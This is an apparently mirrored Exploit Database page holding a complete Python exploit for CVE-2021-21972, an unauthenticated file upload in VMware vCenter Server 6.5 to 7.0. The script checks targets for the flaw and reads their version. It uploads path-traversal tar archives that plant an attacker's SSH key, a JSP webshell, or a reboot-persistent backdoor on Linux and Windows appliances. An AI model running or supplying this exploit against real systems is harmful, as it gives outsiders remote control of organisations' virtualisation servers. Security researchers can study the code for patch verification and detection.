VMware vCenter Server 7.0 – Unauthenticated File Upload

Exploit Database
123 阅读

作者： Photubias

日期： 2021-03-01
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/49602/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload

# Date: 2021-02-27

# Exploit Author: Photubias

# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html

# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)

# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds

# CVE: CVE-2021-21972

#!/usr/bin/env python3

'''

This program is free software: you can redistribute it and/or modify

it under the terms of the GNU General Public License as published by

the Free Software Foundation, either version 3 of the License, or

(at your option) any later version.

This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the

GNU General Public License for more details.

You should have received a copy of the GNU General Public License

along with this program.If not, see <http://www.gnu.org/licenses/>.

File name CVE-2021-21972.py

written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

CVE-2021-21972 is an unauthenticated file upload and overwrite,

exploitation can be done via SSH public key upload or a webshell

The webshell must be of type JSP, and its success depends heavily on the specific vCenter version

# Manual verification:https://<ip>/ui/vropspluginui/rest/services/checkmobregister

#A white page means vulnerable

#A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)

# Notes:

#* On Linux SSH key upload is always best, when SSH access is possible & enabled

#* On Linux the upload is done as user vsphere-ui:users

#* On Windows the upload is done as system user

#* vCenter 6.5 <=7515524 does not contain the vulnerable component "vropspluginui"

#* vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload

This is a native implementation without requirements, written in Python 3.

Works equally well on Windows as Linux (as MacOS, probably ;-)

Features: vulnerability checker + exploit

'''

import os, tarfile, sys, optparse, requests

requests.packages.urllib3.disable_warnings()

lProxy = {}

SM_TEMPLATE = b'''<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

<env:Body>

<_this type="ServiceInstance">ServiceInstance</_this>

</RetrieveServiceContent>

</env:Body>

</env:Envelope>'''

sURL = sFile = sRpath = sType = None

def parseArguments(options):

global sURL, sFile, sType, sRpath, lProxy

if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')

sURL = options.url

if sURL[-1:] == '/': sURL = sURL[:-1]

if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL

sFile = options.file

if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)

sType = 'ssh'

if options.type: sType = options.type

if options.rpath: sRpath = options.rpath

else: sRpath = None

if options.proxy: lProxy = {'https': options.proxy}

def getVersion(sURL):

def getValue(sResponse, sTag = 'vendor'):

try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]

except: pass

return ''

oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)

#print(oResponse.text)

if oResponse.status_code == 200:

sResult = oResponse.text

if not 'VMware' in getValue(sResult, 'vendor'):

exit('[-] Not a VMware system: ' + sURL)

else:

sName = getValue(sResult, 'name')

sVersion = getValue(sResult, 'version') # e.g. 7.0.0

sBuild = getValue(sResult, 'build') # e.g. 15934073

sFull = getValue(sResult, 'fullName')

print('[+] Identified: ' + sFull)

return sVersion, sBuild

exit('[-] Not a VMware system: ' + sURL)

def verify(sURL):

#return True

sURL += '/ui/vropspluginui/rest/services/uploadova'

try:

oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)

except:

exit('[-] System not available: ' + sURL)

if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely

else: return False

def createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):

def getResourcePath():

oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)

return oResponse.text.split('static/')[1].split('/')[0]

oTar = tarfile.open('payloadLin.tar','w')

if sRpath: ## version & build not important

if sRpath[0] == '/': sRpath = sRpath[1:]

sPayloadPath = '../../' + sRpath

oTar.add(sFile, arcname=sPayloadPath)

oTar.close()

return 'absolute'

elif sType.lower() == 'ssh': ## version & build not important

sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'

oTar.add(sFile, arcname=sPayloadPath)

oTar.close()

return 'ssh'

elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):

## vCenter 6.5/6.7 < 13010631, just this location with a subnumber

sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)

print('[!] Selected uploadpath: ' + sPayloadPath[5:])

for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)

oTar.close()

return 'webshell'

elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):

## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>

sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)

print('[!] Selected uploadpath: ' + sPayloadPath[5:])

oTar.add(sFile, arcname=sPayloadPath)

oTar.close()

return 'backdoor'

else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):

## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)

sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)

print('[!] Selected uploadpath: ' + sPayloadPath[5:])

oTar.add(sFile, arcname=sPayloadPath)

oTar.close()

return 'backdoor'

def createTarWin(sFile, sRpath = None):

## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows

if sRpath:

if sRpath[0] == '/': sRpath = sRpath[:1]

sPayloadPath = '../../' + sRpath

else:

sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)

oTar = tarfile.open('payloadWin.tar','w')

oTar.add(sFile, arcname=sPayloadPath)

oTar.close()

def uploadFile(sURL, sUploadType, sFile):

#print('[!] Uploading ' + sFile)

sFile = os.path.basename(sFile)

sUploadURL = sURL +'/ui/vropspluginui/rest/services/uploadova'

arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}

## Linux

oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)

if oResponse.status_code == 200:

if oResponse.text == 'SUCCESS':

print('[+] Linux payload uploaded succesfully.')

if sUploadType == 'ssh':

print('[+] SSH key installed for user \'vsphere-ui\'.')

print(' Please run \'ssh vsphere-ui@' + sURL.replace('https://','') + '\'')

return True

elif sUploadType == 'webshell':

sWebshell = sURL + '/ui/resources/' + sFile

#print('testing ' + sWebshell)

oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)

if oResponse.status_code != 404:

print('[+] Webshell verified, please visit: ' + sWebshell)

return True

elif sUploadType == 'backdoor':

sWebshell = sURL + '/ui/resources/' + sFile

print('[+] Backdoor ready, please reboot or wait for a reboot')

print(' then open: ' + sWebshell)

else: ## absolute

pass

## Windows

arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}

oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)

if oResponse.status_code == 200:

if oResponse.text == 'SUCCESS':

print('[+] Windows payload uploaded succesfully.')

if sUploadType == 'backdoor':

print('[+] Absolute upload looks OK')

return True

else:

sWebshell = sURL + '/statsreport/' + sFile

oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)

if oResponse.status_code != 404:

print('[+] Webshell verified, please visit: ' + sWebshell)

return True

return False

if __name__ == "__main__":

usage = (

'Usage: %prog [option]\n'

'Exploiting Windows & Linux vCenter Server\n'

'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \'\'\n'

'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\n'

'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')

parser = optparse.OptionParser(usage=usage)

parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')

parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')

parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')

parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')

parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')

(options, args) = parser.parse_args()

parseArguments(options)

## Verify

if verify(sURL): print('[+] Target vulnerable: ' + sURL)

else: exit('[-] Target not vulnerable: ' + sURL)

## Read out the version

sVersion, sBuild = getVersion(sURL)

if sRpath: print('[!] Ready to upload your file to ' + sRpath)

elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \'' + sFile + '\'')

else: print('[!] Ready to upload webshell \'' + sFile + '\'')

sAns = input('[?] Want to exploit? [y/N]: ')

if not sAns or not sAns[0].lower() == 'y': exit()

## Create TAR file

sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)

if not sUploadType == 'ssh': createTarWin(sFile, sRpath)

## Upload and verify

uploadFile(sURL, sUploadType, sFile)

## Cleanup

os.remove('payloadLin.tar')

os.remove('payloadWin.tar')